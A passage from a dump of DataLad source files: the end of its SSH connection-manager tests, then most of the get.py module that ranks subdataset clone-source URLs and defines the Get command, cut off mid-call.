exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test')))\n still_exists_2 = exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test2')))\n\n eq_(existed_before_1, still_exists_1)\n eq_(existed_before_2, still_exists_2)\n\n\n@with_tempfile\ndef test_ssh_manager_close_no_throw(bogus_socket=None):\n manager = MultiplexSSHManager()\n\n class bogus:\n def close(self):\n raise Exception(\"oh I am so bad\")\n\n @property\n def ctrl_path(self):\n with open(bogus_socket, \"w\") as f:\n f.write(\"whatever\")\n return Path(bogus_socket)\n\n # since we are digging into protected area - should also set _prev_connections\n manager._prev_connections = {}\n manager._connections['bogus'] = bogus()\n assert_raises(Exception, manager.close)\n assert_raises(Exception, manager.close)\n\n # but should proceed just fine if allow_fail=False\n with swallow_logs(new_level=logging.DEBUG) as cml:\n manager.close(allow_fail=False)\n assert_in('Failed to close a connection: oh I am so bad', cml.out)\n\n\n@skip_if_on_windows\n@skip_ssh\n@with_tempfile(mkdir=True)\n@with_tempfile(content='one')\n@with_tempfile(content='two')\ndef test_ssh_copy(sourcedir=None, sourcefile1=None, sourcefile2=None):\n port = get_ssh_port('datalad-test')\n remote_url = 'ssh://datalad-test:{}'.format(port)\n manager = SSHManager()\n ssh = manager.get_connection(remote_url)\n\n # copy content of sourcefile3 to an obscurely named file in sourcedir\n obscure_file = get_most_obscure_supported_name()\n obscure_path = opj(sourcedir, obscure_file)\n with open(obscure_path, 'w') as f:\n f.write('three')\n\n # copy first two temp files to remote_url:sourcedir\n sourcefiles = [sourcefile1, sourcefile2]\n ssh.put(sourcefiles, opj(remote_url, sourcedir))\n # copy obscure file to remote_url:sourcedir/'<obscure_file_name>.c opy'\n # we copy to a different name because the test setup maps local dir and\n # remote dir to the same directory on the test machine. That means the file\n # is copied onto itself. With ssh version 9 this leads to an empty file.\n # We perform copy instead of just writing the content to the destination\n # file, because ww want to ensure that the source file is picked up by\n # 'ssh.put()'.\n ssh.put([obscure_path], opj(remote_url, sourcedir, obscure_file + '.c opy'))\n\n # docs promise that connection is auto-opened in case of multiplex\n if _ssh_manager_is_multiplex:\n ok_(ssh.is_open())\n\n # recursive copy tempdir to remote_url:targetdir\n targetdir = sourcedir + '.c opy'\n ssh.put(sourcedir, opj(remote_url, targetdir),\n recursive=True, preserve_attrs=True)\n\n # check if sourcedir copied to remote_url:targetdir\n ok_(isdir(targetdir))\n # check if scp preserved source directory attributes\n # if source_mtime=1.12s, scp -p sets target_mtime = 1.0s, test that\n eq_(getmtime(targetdir), int(getmtime(sourcedir)) + 0.0)\n\n # check if targetfiles(and its content) exist in remote_url:targetdir,\n # this implies file(s) and recursive directory copying pass\n for targetfile, content in zip(sourcefiles + [obscure_file + '.c opy'],\n ['one', 'two', 'three']):\n targetpath = opj(targetdir, targetfile)\n ok_(exists(targetpath))\n with open(targetpath, 'r') as fp:\n eq_(content, fp.read())\n\n # and now a quick smoke test for get\n # but simplify the most obscure filename slightly to not trip `scp` itself\n togetfile = Path(targetdir) / (obscure_file.replace('`', '') + '2')\n togetfile.write_text(str('something'))\n ssh.get(opj(remote_url, str(togetfile)), sourcedir)\n ok_((Path(sourcedir) / togetfile.name).exists())\n\n ssh.close()\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_compound_cmds():\n ssh = SSHManager().get_connection('ssh://datalad-test')\n out, err = ssh('[ 1 = 2 ] && echo no || echo success')\n eq_(out.strip(), 'success')\n ssh.close() # so we get rid of the possibly lingering connections\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_custom_identity_file():\n ifile = \"/tmp/dl-test-ssh-id\" # Travis\n if not op.exists(ifile):\n raise SkipTest(\"Travis-specific '{}' identity file does not exist\"\n .format(ifile))\n\n with patch_config({\"datalad.ssh.identityfile\": ifile}):\n with swallow_logs(new_level=logging.DEBUG) as cml:\n manager = SSHManager()\n ssh = manager.get_connection('ssh://datalad-test')\n cmd_out, _ = ssh(\"echo blah\")\n if _ssh_manager_is_multiplex:\n expected_socket = op.join(\n str(manager.socket_dir),\n get_connection_hash(\"datalad-test\", identity_file=ifile))\n ok_(exists(expected_socket))\n manager.close()\n assert_in(\"-i\", cml.out)\n assert_in(ifile, cml.out)\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_git_props():\n remote_url = 'ssh://datalad-test'\n manager = SSHManager()\n ssh = manager.get_connection(remote_url)\n # Note: Avoid comparing these versions directly to the versions in\n # external_versions because the ssh://localhost versions detected might\n # differ depending on how git-annex is installed.\n ok_(ssh.get_annex_version())\n ok_(ssh.get_git_version())\n manager.close() # close possibly still present connections\n\n\n# situation on our test windows boxes is complicated\n# login shell is a POSIX one, path handling and equivalence between\n# local and \"remote\" needs more research\n@skip_if_on_windows\n@skip_ssh\n@with_tempfile(mkdir=True)\ndef test_bundle_invariance(path=None):\n remote_url = 'ssh://datalad-test'\n manager = SSHManager()\n testfile = Path(path) / 'dummy'\n for flag in (True, False):\n assert_false(testfile.exists())\n ssh = manager.get_connection(remote_url, use_remote_annex_bundle=flag)\n ssh('cd .>{}'.format(str(testfile)))\n ok_(testfile.exists())\n testfile.unlink()\n" }, { "alpha_fraction": 0.5767908096313477, "alphanum_fraction": 0.5788007974624634, "avg_line_length": 39.56385040283203, "blob_id": "48f64b2ce0f027026674c15577b0d6a86aefa396", "content_id": "a5a927548a3a5ba973a3f6d91890aff9773ed436", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41294, "license_type": "permissive", "max_line_length": 109, "num_lines": 1018, "path": "/datalad/distribution/get.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for getting dataset content\n\n\"\"\"\n\nimport logging\nimport re\n\nimport os.path as op\n\nfrom datalad.config import ConfigManager\nfrom datalad.interface.base import (\n Interface,\n eval_results,\n)\nfrom datalad.interface.base import build_doc\nfrom datalad.interface.results import (\n get_status_dict,\n results_from_paths,\n annexjson2result,\n success_status_map,\n results_from_annex_noinfo,\n)\nfrom datalad.interface.common_opts import (\n recursion_flag,\n location_description,\n jobs_opt,\n reckless_opt,\n)\nfrom datalad.interface.results import is_ok_dataset\nfrom datalad.support.constraints import (\n EnsureInt,\n EnsureChoice,\n EnsureStr,\n EnsureNone,\n)\nfrom datalad.support.collections import ReadOnlyDict\nfrom datalad.support.param import Parameter\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.gitrepo import (\n GitRepo,\n _fixup_submodule_dotgit_setup,\n)\nfrom datalad.support.exceptions import (\n CapturedException,\n CommandError,\n InsufficientArgumentsError,\n)\nfrom datalad.support.network import (\n URL,\n RI,\n urlquote,\n)\nfrom datalad.support.parallel import (\n ProducerConsumerProgressLog,\n)\nfrom datalad.utils import (\n unique,\n Path,\n get_dataset_root,\n shortened_repr,\n)\n\nfrom datalad.local.subdatasets import Subdatasets\n\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.core.distributed.clone import clone_dataset\nfrom datalad.distribution.utils import _get_flexible_source_candidates\n\n__docformat__ = 'restructuredtext'\n\nlgr = logging.getLogger('datalad.distribution.get')\n\n\ndef _get_remotes_having_commit(repo, commit_hexsha, with_urls_only=True):\n \"\"\"Traverse all branches of the remote and check if commit in any of their ancestry\n\n It is a generator yielding names of the remotes\n \"\"\"\n remote_branches = [\n b['refname:strip=2']\n for b in repo.for_each_ref_(\n fields='refname:strip=2',\n pattern='refs/remotes',\n contains=commit_hexsha)]\n return [\n remote\n for remote in repo.get_remotes(with_urls_only=with_urls_only)\n if any(rb.startswith(remote + '/') for rb in remote_branches)\n ]\n\n\ndef _get_flexible_source_candidates_for_submodule(ds, sm):\n \"\"\"Assemble candidate locations from where to clone a submodule\n\n The following location candidates are considered. For each candidate a\n cost is given in parenthesis, higher values indicate higher cost, and\n thus lower priority:\n\n - A datalad URL recorded in `.gitmodules` (cost 590). This allows for\n datalad URLs that require additional handling/resolution by datalad, like\n ria-schemes (ria+http, ria+ssh, etc.)\n\n - A URL or absolute path recorded for git in `.gitmodules` (cost 600).\n\n - URL of any configured superdataset remote that is known to have the\n desired submodule commit, with the submodule path appended to it.\n There can be more than one candidate (cost 650).\n\n - In case `.gitmodules` contains a relative path instead of a URL,\n the URL of any configured superdataset remote that is known to have the\n desired submodule commit, with this relative path appended to it.\n There can be more than one candidate (cost 650).\n\n - In case `.gitmodules` contains a relative path as a URL, the absolute\n path of the superdataset, appended with this relative path (cost 900).\n\n Additional candidate URLs can be generated based on templates specified as\n configuration variables with the pattern\n\n `datalad.get.subdataset-source-candidate-<name>`\n\n where `name` is an arbitrary identifier. If name starts with three digits\n (e.g. '400myserver') these will be interpreted as a cost, and the\n respective candidate will be sorted into the generated candidate list\n according to this cost. If no cost is given, a default of 700\n is used.\n\n A template string assigned to such a variable can utilize the Python format\n mini language and may reference a number of properties that are inferred\n from the parent dataset's knowledge about the target subdataset. Properties\n include any submodule property specified in the respective `.gitmodules`\n record. For convenience, an existing `datalad-id` record is made available\n under the shortened name `id`.\n\n Additionally, the URL of any configured remote that contains the respective\n submodule commit is available as `remoteurl-<name>` property, where `name`\n is the configured remote name.\n\n Lastly, all candidates are sorted according to their cost (lower values\n first), and duplicate URLs are stripped, while preserving the first item in the\n candidate list.\n\n More information on this feature can be found at\n http://handbook.datalad.org/r.html?clone-priority\n\n Parameters\n ----------\n ds : Dataset\n Parent dataset of to-be-installed subdataset.\n sm : dict\n Submodule record as produced by `subdatasets()`.\n\n Returns\n -------\n list of dict\n Where each dict has keys 'cost' (int), 'name' (str), 'url' (str).\n Names are not unique and either derived from the name of the respective\n remote, template configuration variable, or 'local'.\n \"\"\"\n\n # short cuts\n ds_repo = ds.repo\n sm_url = sm.get('gitmodule_url', None)\n sm_datalad_url = sm.get('gitmodule_datalad-url', None)\n sm_path = op.relpath(sm['path'], start=sm['parentds'])\n\n clone_urls = []\n\n # CANDIDATE: tracking remote of the current branch\n tracking_remote, tracking_branch = ds_repo.get_tracking_branch()\n candidate_remotes = [tracking_remote] if tracking_remote else []\n\n # if we have a remote, let's check the location of that remote\n # for the presence of the desired submodule\n last_commit = ds_repo.get_last_commit_hexsha(sm_path)\n if last_commit:\n # CANDIDATE: any remote that has the commit when the submodule was\n # last modified\n\n # ideally should also give preference to the remotes which have\n # the same branch checked out I guess\n candidate_remotes += list(_get_remotes_having_commit(ds_repo, last_commit))\n\n # prepare a dict to generate URL candidates from templates\n sm_candidate_props = {\n k[10:].replace('datalad-id', 'id'): v\n for k, v in sm.items()\n if k.startswith('gitmodule_')\n }\n\n for remote in unique(candidate_remotes):\n remote_url = ds_repo.get_remote_url(remote, push=False)\n\n # Directly on parent's ds url\n if remote_url:\n # make remotes and their URLs available to template rendering\n sm_candidate_props['remoteurl-{}'.format(remote)] = remote_url\n # attempt: submodule checkout at parent remote URL\n # We might need to quote sm_path portion, e.g. for spaces etc\n if isinstance(RI(remote_url), URL):\n sm_path_url = urlquote(sm_path)\n else:\n sm_path_url = sm_path\n\n clone_urls.extend(\n dict(cost=650, name=remote, url=url)\n for url in _get_flexible_source_candidates(\n # alternate suffixes are tested by `clone` anyways\n sm_path_url, remote_url, alternate_suffix=False)\n )\n\n # attempt: provided (configured?) submodule URL\n # TODO: consider supporting DataLadRI here? or would confuse\n # git and we wouldn't want that (i.e. not allow pure git clone\n # --recursive)\n if sm_url:\n clone_urls.extend(\n dict(cost=600, name=remote, url=url)\n for url in _get_flexible_source_candidates(\n sm_url,\n remote_url,\n alternate_suffix=False)\n )\n\n cost_candidate_expr = re.compile('[0-9][0-9][0-9].*')\n candcfg_prefix = 'datalad.get.subdataset-source-candidate-'\n for name, tmpl in [(c[len(candcfg_prefix):],\n ds_repo.config[c])\n for c in ds_repo.config.keys()\n if c.startswith(candcfg_prefix)]:\n # ensure that there is only one template of the same name\n if type(tmpl) == tuple and len(tmpl) > 1:\n raise ValueError(\n f\"There are multiple URL templates for submodule clone \"\n f\"candidate '{name}', but only one is allowed. \"\n f\"Check datalad.get.subdataset-source-candidate-* configuration!\"\n )\n try:\n url = tmpl.format(**sm_candidate_props)\n except KeyError as e:\n ce = CapturedException(e)\n lgr.warning(\n \"Failed to format template %r for a submodule clone. \"\n \"Error: %s\", tmpl, ce\n )\n continue\n # we don't want \"flexible_source_candidates\" here, this is\n # configuration that can be made arbitrarily precise from the\n # outside. Additional guesswork can only make it slower\n has_cost = cost_candidate_expr.match(name) is not None\n clone_urls.append(\n # assign a default cost, if a config doesn't have one\n dict(\n cost=int(name[:3]) if has_cost else 700,\n name=name[3:] if has_cost else name,\n url=url,\n from_config=True,\n ))\n\n # CANDIDATE: the actual configured gitmodule URL\n if sm_url:\n clone_urls.extend(\n dict(cost=900, name='local', url=url)\n for url in _get_flexible_source_candidates(\n sm_url,\n ds.path,\n alternate_suffix=False)\n # avoid inclusion of submodule location itself\n if url != sm['path']\n )\n\n # Consider original datalad URL in .gitmodules before any URL that is meant\n # to be consumed by git:\n if sm_datalad_url:\n clone_urls.append(\n dict(cost=590, name='dl-url', url=sm_datalad_url)\n )\n\n # sort all candidates by their label, thereby allowing a\n # candidate provided by configuration to purposefully\n # sort before or after automatically generated configuration\n clone_urls = sorted(clone_urls, key=lambda x: x['cost'])\n # take out any duplicate source candidates\n # unique() takes out the duplicated at the tail end\n clone_urls = unique(clone_urls, lambda x: x['url'])\n lgr.debug('Assembled %i clone candidates for %s: %s',\n len(clone_urls), sm_path, [cand['url'] for cand in clone_urls])\n\n return clone_urls\n\n\ndef _install_subds_from_flexible_source(ds, sm, **kwargs):\n \"\"\"Tries to obtain a given subdataset from several meaningful locations\n\n Parameters\n ----------\n ds : Dataset\n Parent dataset of to-be-installed subdataset.\n sm : dict\n Submodule record as produced by `subdatasets()`.\n **kwargs\n Passed onto clone()\n \"\"\"\n sm_path = op.relpath(sm['path'], start=sm['parentds'])\n # compose a list of candidate clone URLs\n clone_urls = _get_flexible_source_candidates_for_submodule(ds, sm)\n\n # prevent inevitable exception from `clone`\n dest_path = op.join(ds.path, sm_path)\n clone_urls_ = [src['url'] for src in clone_urls if src['url'] != dest_path]\n\n if not clone_urls:\n # yield error\n yield get_status_dict(\n action='install',\n ds=ds,\n status='error',\n message=(\n \"Have got no candidates to install subdataset %s from.\",\n sm_path),\n logger=lgr,\n )\n return\n\n for res in clone_dataset(\n clone_urls_,\n Dataset(dest_path),\n cfg=ds.config,\n checkout_gitsha=sm['gitshasum'],\n **kwargs):\n if res.get('action', None) == 'install' and \\\n res.get('status', None) == 'ok' and \\\n res.get('type', None) == 'dataset' and \\\n res.get('path', None) == dest_path:\n _fixup_submodule_dotgit_setup(ds, sm_path)\n\n section_name = 'submodule.{}'.format(sm['gitmodule_name'])\n # register the submodule as \"active\" in the superdataset\n ds.config.set(\n '{}.active'.format(section_name),\n 'true',\n reload=False, force=True, scope='local',\n )\n ds.config.set(\n '{}.url'.format(section_name),\n # record the actual source URL of the successful clone\n # and not a funky prediction based on the parent ds\n # like ds.repo.update_submodule() would do (does not\n # accept a URL)\n res['source']['giturl'],\n reload=True, force=True, scope='local',\n )\n yield res\n\n subds = Dataset(dest_path)\n if not subds.is_installed():\n lgr.debug('Desired subdataset %s did not materialize, stopping', subds)\n return\n\n # check whether clone URL generators were involved\n cand_cfg = [rec for rec in clone_urls if rec.get('from_config', False)]\n if cand_cfg:\n # get a handle on the configuration that is specified in the\n # dataset itself (local and dataset)\n super_cfg = ConfigManager(dataset=ds, source='branch-local')\n need_reload = False\n for rec in cand_cfg:\n # check whether any of this configuration originated from the\n # superdataset. if so, inherit the config in the new subdataset\n # clone unless that config is already specified in the new\n # subdataset which can happen during postclone_cfg routines.\n # if not, keep things clean in order to be able to move with any\n # outside configuration change\n for c in ('datalad.get.subdataset-source-candidate-{}{}'.format(\n rec['cost'], rec['name']),\n 'datalad.get.subdataset-source-candidate-{}'.format(\n rec['name'])):\n if c in super_cfg.keys() and c not in subds.config.keys():\n subds.config.set(c, super_cfg.get(c), scope='local',\n reload=False)\n need_reload = True\n break\n if need_reload:\n subds.config.reload(force=True)\n\n\ndef _install_necessary_subdatasets(\n ds, path, reckless, refds_path, description=None):\n \"\"\"Installs subdatasets of `ds`, that are necessary to obtain in order\n to have access to `path`.\n\n Gets the subdataset containing `path` regardless of whether or not it was\n already installed. While doing so, installs everything necessary in between\n the uppermost installed one and `path`.\n\n Note: `ds` itself has to be installed.\n\n Parameters\n ----------\n ds: Dataset\n path: str\n reckless: bool\n \"\"\"\n # figuring out what dataset to start with, --contains limits --recursive\n # to visit only subdataset on the trajectory to the target path\n subds_trail = ds.subdatasets(contains=path, recursive=True,\n on_failure=\"ignore\",\n result_filter=is_ok_dataset,\n result_renderer='disabled')\n if not subds_trail:\n # there is not a single known subdataset (installed or not)\n # for this path -- job done\n return\n # otherwise we start with the one deepest down\n cur_subds = subds_trail[-1]\n\n while not GitRepo.is_valid_repo(cur_subds['path']):\n # install using helper that give some flexibility regarding where to\n # get the module from\n for res in _install_subds_from_flexible_source(\n Dataset(cur_subds['parentds']),\n cur_subds,\n reckless=reckless,\n description=description):\n if res.get('action', None) == 'install':\n if res['status'] == 'ok':\n # report installation, whether it helped or not\n res['message'] = (\n \"Installed subdataset in order to get %s\",\n str(path))\n # next subdataset candidate\n sd = Dataset(res['path'])\n yield res\n elif res['status'] in ('impossible', 'error'):\n yield res\n # we cannot go deeper, we need to stop\n return\n else:\n # report unconditionally to caller\n yield res\n if sd.pathobj == path:\n # we've just got the target subdataset, we're done\n return\n # now check whether the just installed subds brought us any closer to\n # the target path\n subds_trail = sd.subdatasets(contains=path, recursive=False,\n on_failure='ignore',\n result_filter=is_ok_dataset,\n result_renderer='disabled')\n if not subds_trail:\n # no (newly available) subdataset gets us any closer\n return\n # next round\n cur_subds = subds_trail[-1]\n\n\ndef _recursive_install_subds_underneath(ds, recursion_limit, reckless, start=None,\n refds_path=None, description=None, jobs=None, producer_only=False):\n if isinstance(recursion_limit, int) and recursion_limit <= 0:\n return\n # install using helper that give some flexibility regarding where to\n # get the module from\n\n # Keep only paths, to not drag full instances of Datasets along,\n # they are cheap to instantiate\n sub_paths_considered = []\n subs_notneeded = []\n\n def gen_subs_to_install(): # producer\n for sub in ds.subdatasets(\n path=start,\n return_type='generator',\n result_renderer='disabled'):\n sub_path = sub['path']\n sub_paths_considered.append(sub_path)\n if sub.get('gitmodule_datalad-recursiveinstall', '') == 'skip':\n lgr.debug(\n \"subdataset %s is configured to be skipped on recursive installation\",\n sub_path)\n continue\n # TODO: Yarik is lost among all parentds, ds, start, refds_path so is not brave enough to\n # assume any from the record, thus will pass \"ds.path\" around to consumer\n yield ds.path, ReadOnlyDict(sub), recursion_limit\n\n def consumer(ds_path__sub__limit):\n ds_path, sub, recursion_limit = ds_path__sub__limit\n subds = Dataset(sub['path'])\n if sub.get('state', None) != 'absent':\n rec = get_status_dict('install', ds=subds, status='notneeded', logger=lgr, refds=refds_path)\n subs_notneeded.append(rec)\n yield rec\n # do not continue, even if an intermediate dataset exists it\n # does not imply that everything below it does too\n else:\n # TODO: here we need another \"ds\"! is it within \"sub\"?\n yield from _install_subds_from_flexible_source(\n Dataset(ds_path), sub, reckless=reckless, description=description)\n\n if not subds.is_installed():\n # an error result was emitted, and the external consumer can decide\n # what to do with it, but there is no point in recursing into\n # something that should be there, but isn't\n lgr.debug('Subdataset %s could not be installed, skipped', subds)\n return\n\n # recurse\n # we can skip the start expression, we know we are within\n for res in _recursive_install_subds_underneath(\n subds,\n recursion_limit=recursion_limit - 1 if isinstance(recursion_limit, int) else recursion_limit,\n reckless=reckless,\n refds_path=refds_path,\n jobs=jobs,\n producer_only=True # we will be adding to producer queue\n ):\n producer_consumer.add_to_producer_queue(res)\n\n producer = gen_subs_to_install()\n if producer_only:\n yield from producer\n else:\n producer_consumer = ProducerConsumerProgressLog(\n producer,\n consumer,\n # no safe_to_consume= is needed since we are doing only at a single level ATM\n label=\"Installing\",\n unit=\"datasets\",\n jobs=jobs,\n lgr=lgr\n )\n yield from producer_consumer\n\n\ndef _install_targetpath(\n ds,\n target_path,\n recursive,\n recursion_limit,\n reckless,\n refds_path,\n description,\n jobs=None,\n):\n \"\"\"Helper to install as many subdatasets as needed to verify existence\n of a target path\n\n Parameters\n ==========\n ds : Dataset\n Locally available dataset that contains the target path\n target_path : Path\n \"\"\"\n # if it is an empty dir, it could still be a subdataset that is missing\n if (target_path.is_dir() and any(target_path.iterdir())) or \\\n (not target_path.is_dir()\n and (target_path.is_symlink() or target_path.exists())):\n yield dict(\n action='get',\n type='dataset',\n # this cannot just be the dataset path, as the original\n # situation of datasets avail on disk can have changed due\n # to subdataset installation. It has to be actual subdataset\n # it resides in, because this value is used to determine which\n # dataset to call `annex-get` on\n # TODO stringification is a PY35 compatibility kludge\n path=get_dataset_root(str(target_path)),\n status='notneeded',\n contains=[target_path],\n refds=refds_path,\n )\n else:\n # we don't have it yet. is it in a subdataset?\n for res in _install_necessary_subdatasets(\n ds, target_path, reckless, refds_path, description=description):\n if (target_path.is_symlink() or target_path.exists()):\n # this dataset brought the path, mark for annex\n # processing outside\n res['contains'] = [target_path]\n # just spit it out\n yield res\n if not (target_path.is_symlink() or target_path.exists()):\n # looking for subdatasets did not help -> all hope is lost\n yield dict(\n action='get',\n path=str(target_path),\n status='impossible',\n refds=refds_path,\n message='path does not exist',\n )\n return\n # we have the target path\n if not (recursive\n #and not recursion_limit == 'existing' \\\n and target_path.is_dir()):\n # obtain any subdatasets underneath the paths given\n # a non-directory cannot have content underneath\n return\n if recursion_limit == 'existing':\n for res in ds.subdatasets(\n state='present',\n path=target_path,\n recursive=recursive,\n recursion_limit=recursion_limit,\n return_type='generator',\n result_renderer='disabled'):\n res.update(\n contains=[Path(res['path'])],\n action='get',\n status='notneeded',\n )\n yield res\n return\n lgr.info(\n \"Ensuring presence of %s%s\",\n ds,\n (\" to get %s\" % target_path\n if ds.path != target_path\n else \"\"))\n for res in _recursive_install_subds_underneath(\n ds,\n # target_path was explicitly given as input\n # we count recursions from the input, hence we\n # can start with the full number\n recursion_limit,\n reckless,\n # TODO keep Path when RF is done\n start=str(target_path),\n refds_path=refds_path,\n description=description,\n jobs=jobs,\n ):\n # yield immediately so errors could be acted upon\n # outside, before we continue\n res.update(\n # do not override reported action, could be anything\n #action='get',\n contains=[Path(res['path'])],\n )\n yield res\n\n\ndef _get_targetpaths(ds, content, refds_path, source, jobs):\n # not ready for Path instances...\n content = [str(c) for c in content]\n # hand over to git-annex, get files content,\n # report files in git as 'notneeded' to get\n ds_repo = ds.repo\n # needs to be an annex to get content\n if not isinstance(ds_repo, AnnexRepo):\n for r in results_from_paths(\n content, status='notneeded',\n message=\"no dataset annex, content already present\",\n action='get',\n type='file',\n logger=lgr,\n refds=refds_path):\n yield r\n return\n respath_by_status = {}\n try:\n results = ds_repo.get(\n content,\n options=['--from=%s' % source] if source else [],\n jobs=jobs)\n except CommandError as exc:\n results = exc.kwargs.get(\"stdout_json\")\n if not results:\n raise\n\n for res in results:\n res = annexjson2result(res, ds, type='file', logger=lgr,\n refds=refds_path)\n success = success_status_map[res['status']]\n # TODO: in case of some failed commands (e.g. get) there might\n # be no path in the record. yoh has only vague idea of logic\n # here so just checks for having 'path', but according to\n # results_from_annex_noinfo, then it would be assumed that\n # `content` was acquired successfully, which is not the case\n if 'path' in res:\n respath_by_status[success] = \\\n respath_by_status.get(success, []) + [res['path']]\n yield res\n\n for r in results_from_annex_noinfo(\n ds,\n content,\n respath_by_status,\n dir_fail_msg='could not get some content in %s %s',\n noinfo_dir_msg='nothing to get from %s',\n noinfo_file_msg='already present',\n action='get',\n logger=lgr,\n refds=refds_path):\n yield r\n\n\ndef _check_error_reported_before(res: dict, error_dict: dict):\n # Helper to check if an impossible result for a path that does\n # not exist has already been yielded before. If not, add path\n # to the error_dict.\n if res.get('action', None) == 'get' and \\\n res.get('status', None) == 'impossible' and \\\n res.get('message', None) == 'path does not exist':\n non_existing_path = res.get('path', None)\n if non_existing_path not in error_dict.keys():\n # if path not in dict, add it\n error_dict[non_existing_path] = True\n return False\n else:\n return True\n return False\n\n\n@build_doc\nclass Get(Interface):\n \"\"\"Get any dataset content (files/directories/subdatasets).\n\n This command only operates on dataset content. To obtain a new independent\n dataset from some source use the `clone` command.\n\n By default this command operates recursively within a dataset, but not\n across potential subdatasets, i.e. if a directory is provided, all files in\n the directory are obtained. Recursion into subdatasets is supported too. If\n enabled, relevant subdatasets are detected and installed in order to\n fulfill a request.\n\n Known data locations for each requested file are evaluated and data are\n obtained from some available location (according to git-annex configuration\n and possibly assigned remote priorities), unless a specific source is\n specified.\n\n *Getting subdatasets*\n\n Just as DataLad supports getting file content from more than one location,\n the same is supported for subdatasets, including a ranking of individual\n sources for prioritization.\n\n The following location candidates are considered. For each candidate a\n cost is given in parenthesis, higher values indicate higher cost, and thus\n lower priority:\n\n - A datalad URL recorded in `.gitmodules` (cost 590). This allows for\n datalad URLs that require additional handling/resolution by datalad, like\n ria-schemes (ria+http, ria+ssh, etc.)\n\n - A URL or absolute path recorded for git in `.gitmodules` (cost 600).\n\n - URL of any configured superdataset remote that is known to have the\n desired submodule commit, with the submodule path appended to it.\n There can be more than one candidate (cost 650).\n\n - In case `.gitmodules` contains a relative path instead of a URL,\n the URL of any configured superdataset remote that is known to have the\n desired submodule commit, with this relative path appended to it.\n There can be more than one candidate (cost 650).\n\n - In case `.gitmodules` contains a relative path as a URL, the absolute\n path of the superdataset, appended with this relative path (cost 900).\n\n Additional candidate URLs can be generated based on templates specified as\n configuration variables with the pattern\n\n `datalad.get.subdataset-source-candidate-<name>`\n\n where `name` is an arbitrary identifier. If `name` starts with three digits\n (e.g. '400myserver') these will be interpreted as a cost, and the\n respective candidate will be sorted into the generated candidate list\n according to this cost. If no cost is given, a default of 700 is used.\n\n A template string assigned to such a variable can utilize the Python format\n mini language and may reference a number of properties that are inferred\n from the parent dataset's knowledge about the target subdataset. Properties\n include any submodule property specified in the respective `.gitmodules`\n record. For convenience, an existing `datalad-id` record is made available\n under the shortened name `id`.\n\n Additionally, the URL of any configured remote that contains the respective\n submodule commit is available as `remoteurl-<name>` property, where `name`\n is the configured remote name.\n\n Hence, such a template could be `http://example.org/datasets/{id}` or\n `http://example.org/datasets/{path}`, where `{id}` and `{path}` would be\n replaced by the `datalad-id` or `path` entry in the `.gitmodules` record.\n\n If this config is committed in `.datalad/config`, a clone of a dataset can\n look up any subdataset's URL according to such scheme(s) irrespective of\n what URL is recorded in `.gitmodules`.\n\n Lastly, all candidates are sorted according to their cost (lower values\n first), and duplicate URLs are stripped, while preserving the first item in the\n candidate list.\n\n .. note::\n Power-user info: This command uses :command:`git annex get` to fulfill\n file handles.\n \"\"\"\n _examples_ = [\n dict(text=\"Get a single file\",\n code_py=\"get('path/to/file')\",\n code_cmd=\"datalad get <path/to/file>\"),\n dict(text=\"Get contents of a directory\",\n code_py=\"get('path/to/dir/')\",\n code_cmd=\"datalad get <path/to/dir/>\"),\n dict(text=\"Get all contents of the current dataset and its subdatasets\",\n code_py=\"get(dataset='.', recursive=True)\",\n code_cmd=\"datalad get . -r\"),\n dict(text=\"Get (clone) a registered subdataset, but don't retrieve data\",\n code_py=\"get('path/to/subds', get_data=False)\",\n code_cmd=\"datalad get -n <path/to/subds>\"),\n ]\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n metavar=\"PATH\",\n doc=\"\"\"specify the dataset to perform the add operation on, in\n which case `path` arguments are interpreted as being relative\n to this dataset. If no dataset is given, an attempt is made to\n identify a dataset for each input `path`\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"\"\"path/name of the requested dataset component. The component\n must already be known to a dataset. To add new components to a\n dataset use the `add` command\"\"\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n source=Parameter(\n args=(\"-s\", \"--source\",),\n metavar=\"LABEL\",\n doc=\"\"\"label of the data source to be used to fulfill requests.\n This can be the name of a dataset :term:`sibling` or another known\n source\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n recursive=recursion_flag,\n recursion_limit=Parameter(\n args=(\"-R\", \"--recursion-limit\",),\n metavar=\"LEVELS\",\n constraints=EnsureInt() | EnsureChoice('existing') | EnsureNone(),\n doc=\"\"\"limit recursion into subdataset to the given number of levels.\n Alternatively, 'existing' will limit recursion to subdatasets that already\n existed on the filesystem at the start of processing, and prevent new\n subdatasets from being obtained recursively.\"\"\"),\n get_data=Parameter(\n args=(\"-n\", \"--no-data\",),\n dest='get_data',\n action='store_false',\n doc=\"\"\"whether to obtain data for all file handles. If disabled, `get`\n operations are limited to dataset handles.[CMD: This option prevents data\n for file handles from being obtained CMD]\"\"\"),\n description=location_description,\n reckless=reckless_opt,\n jobs=jobs_opt)\n\n @staticmethod\n @datasetmethod(name='get')\n @eval_results\n def __call__(\n path=None,\n *,\n source=None,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n get_data=True,\n description=None,\n reckless=None,\n jobs='auto',\n ):\n \n if not (dataset or path):\n raise InsufficientArgumentsError(\n \"Neither dataset nor target path(s) provided\")\n # we have to have a single dataset to operate on\n refds = require_dataset(\n dataset, check_installed=True, purpose='get content of 